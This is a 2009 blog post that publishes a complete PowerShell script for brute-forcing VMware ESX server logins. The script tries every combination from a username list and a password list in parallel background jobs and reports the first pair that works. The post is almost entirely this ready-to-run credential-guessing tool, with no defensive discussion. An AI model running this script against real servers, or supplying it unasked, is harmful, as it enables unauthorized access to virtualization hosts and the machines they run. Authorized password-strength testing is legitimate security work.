Tuesday, September 1, 2009

Brute Force ESX Username/Password

This script will brute force the connection to ESX. You can either give it a single username or a username file. Similarly, you can either give it a single password or a password file. You also have the ability to define how many jobs will run in parallel.

#--------------------------------------------------------------
#Description: Powershell Simple VMware ESX Login Brute Force Script
#Version: 1.0
#Author: Tim Medin
#Email: TimMedin A@T securitywhole D.O.T com
#--------------------------------------------------------------
#Parameter Declaration
param (
[Parameter(Position
=0)]
[
string] $Server = $(Read-Host -prompt "Server"),
[Parameter(Mandatory
=$false)]
[
string] $User,
[Parameter(Mandatory
=$false)]
[
string] $Password,
[Parameter(Mandatory
=$false)]
[
string] $UsersFile,
[Parameter(Mandatory
=$false)]
[
string] $PasswordsFile,
[Parameter(Mandatory=$false)]
[
int] $MaxJobs = 10
)

# Function to handle the jobs once they complete
# As the jobs finish (Completed, or Failed) they are handled by this routine
# Each Job has a child job that actually does the work, if that job
# does not have an error then we have found a successful user/pass combo
Function Handle-Jobs {
    Get-Job | Where-Object {
$_.State -ne "Running"} | ForEach-Object {
        $job = $_
        if (!$job.ChildJobs[0].Error) {
            # Found one!
            Receive-Job $job -Keep | Out-Null
            # Echo the user/pass combo stored the job name
            echo "Found $($job.Name)"
            #Clean up all the running jobs
            Get-Job | Stop-Job
            Get-Job | Remove-Job
            #quit
            exit
        }
        Remove-Job
$job
    }
}

# Make sure we have enough info passed in from the parameters
if (!$User -and !$UsersFile) {
    throw "User or UserFile required."
}
if (!$Password -and !$PasswordsFile) {
    throw "Password or PasswordFile required."
}

# If the UsersFile and a Username are provided then use the UsersFile
# Convert UsersFile or single User into an array so we can use a loop
if ($UsersFile)
{
    $Users = Get-Content $UsersFile
}
else
{
    $Users = @($User)
}

# If the PasswordsFile and aPassword is provided then use the PasswordsFile
# Convert PasswordsFile or single Password into an array so we can use a loop
if ($PasswordsFile)
{
    $Passwords = Get-Content $PasswordsFile
}
else
{
    $Passwords = @($Password)
}

$Passwords | ForEach-Object {
    $pass = $_
    $Users | ForEach-Object {
        $usr = $_
 
        # If too many jobs running then wait for some to complete
        while ((Get-Job).Count -ge $MaxJobs) {
            Handle-Jobs
            Start-Sleep -Seconds 5
        }
 
        # Start the job to attempt the connection
        Start-Job -InitializationScript {Add-PSSnapin VMware.VimAutomation.Core} -ScriptBlock { param($Server, $usr, $pass) Connect-VIServer -Server $Server -Protocol https -User $usr -Password $pass } -Name "User:$usr Pass:$pass" -ArgumentList $Server,$usr,$pass
    }
}

"Everything has been queued, waiting for jobs to complete"

# Wait for the jobs to complete
Do {
    Handle-Jobs
    Start-Sleep -Seconds 5
}
while (Get-Job)

No comments:

Post a Comment